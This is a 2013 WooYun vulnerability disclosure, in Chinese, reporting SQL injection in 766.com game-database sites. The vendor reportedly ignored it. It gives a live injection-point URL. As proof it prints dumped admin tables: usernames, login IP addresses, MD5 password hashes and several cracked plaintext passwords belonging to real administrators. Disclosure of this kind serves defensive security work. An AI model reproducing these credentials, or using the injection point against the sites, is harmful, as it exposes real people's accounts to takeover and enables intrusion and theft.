当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035621

漏洞标题:766一堆年久失修的网站存在SQL注入

相关厂商:766.com

漏洞作者: Ovear

提交时间:2013-08-29 18:54

修复时间:2013-09-03 18:55

公开时间:2013-09-03 18:55

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-29: 细节已通知厂商并且等待厂商处理中
2013-09-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

你懂得最基本的sql注入

详细说明:

大部分db查询都使用的一套系统
注入点就是
http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw
还有其他使用同样系统的,梦幻西游啊,什么什么什么的,基本上就是年久失修的网站

漏洞证明:

+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| uid | adminid | lastip | username | password | updateuser | lastactivity |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| 1 | 1 | 117.84.151.95 | dragon | 8621ffdbc5698829397d97767ac13db3 (dragon) | <blank> | 1319755592 |
| 2 | 1 | 218.66.36.119 | 上天入地 | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 1245824876 |
| 3 | 1 | 117.84.151.95 | bayon3t | 326cbac35cb3b880ecd5ff67dcd276aa (banker) | <blank> | 1319755703 |
| 4 | 1 | 218.66.36.119 | keepnet | 6cc1c40f6caa5f92897e4241a31b8991 | <blank> | 1307431737 |
| 5 | 3 | 218.66.57.81 | 766com | 5b711ebff2c42e3cfac6e3ec63781d3e | <blank> | 1361329083 |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+


[22 tables]
+-----------------+
| x_admins |
| x_adminsessions |
| x_at_charaters |
| x_at_datas |
| x_at_types |
| x_attachtypes |
| x_codes |
| x_failedlogins |
| x_gws |
| x_keywords |
| x_maps |
| x_npcs |
| x_occs |
| x_rws |
| x_settings |
| x_skills |
| x_styles |
| x_stylevars |
| x_templates |
| x_wps |
| x_yblevs |
| x_ybs |
+-----------------+


Database: db_mhxy
Table: m_admins
[13 entries]
+---------+--------------+---------------+----------------------------------+-----+------------+
| adminid | lastactivity | lastip | password | uid | username |
+---------+--------------+---------------+----------------------------------+-----+------------+
| 1 | 1310372668 | 120.35.10.225 | 3694e44a7669c4986424bfbb8897cfdf | 13 | xiaomo |
| 1 | 1310375919 | 120.35.10.225 | 348f10f863b27ec106195c96e23dcd91 | 12 | xiaoyu |
| 1 | 1301646109 | 218.66.36.119 | 1bed827ff753e81958090540dced95af | 11 | xiu |
| 1 | 1301475208 | 120.35.10.225 | 3dc5f2a5448ea681ad7ec5a59ca11f2e | 10 | xiangxiang |
| 1 | 1301476079 | 120.35.10.225 | 242bfc1fb44b238986ab168d3610b771 | 9 | yingzi |
| 1 | 1310630815 | 218.66.36.119 | df1bfa7d7bd66664564262fe4dbc8bcc | 8 | daodao |
| 1 | 1301449543 | 120.35.10.225 | afe1b6a9a0055f31096ffd2c8b8066e1 | 7 | dilei |
| 1 | 1301364743 | 120.35.10.225 | a3fbf203ed16a936a471b674f09846da | 6 | junfeng |
| 1 | 1301645302 | 120.35.10.225 | 688f227b9cad4edeed15f067e04d3764 | 5 | lei |
| 1 | 1300675347 | 120.35.10.225 | f4fe292eb01627a0219872d44a305ec5 | 4 | x5 |
| 1 | 1305005162 | 218.66.36.119 | ff89cc66529a8e4aa81bac2a86fa51be | 3 | vincentkid |
| 1 | 1302689813 | 218.66.36.119 | 73f50c9f17291ce93ee52e50b73f6f63 | 2 | lan |
| 1 | 1317088177 | 218.66.36.119 | e10adc3949ba59abbe56e057f20f883e | 1 | admin |
+---------+--------------+---------------+----------------------------------+-----+------------+


修复方案:

该删的删,该补的补

版权声明:转载请注明来源 Ovear@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-03 18:55

厂商回复:

最新状态:

暂无


漏洞评价:

评论